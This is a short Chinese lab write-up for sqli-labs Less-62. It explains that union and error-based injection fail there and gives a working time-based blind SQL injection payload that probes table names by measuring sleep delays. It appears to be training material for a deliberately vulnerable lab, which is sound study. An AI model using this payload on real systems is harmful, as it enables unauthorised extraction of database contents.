Sqli-labs less 62

此处union和报错注入都已经失效了,那我们就要使用延时注入了,此处给出一个示例

payload:

http://127.0.0.1/sqli-labs/Less-62/?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+

当正确的时候时间很短,当错误的时候时间大于10秒,此时可以利用脚本进行尝试。脚本攻击我们放在第三部分,此处就不贴代码了。

原文地址:https://www.cnblogs.com/lcamry/p/5762610.html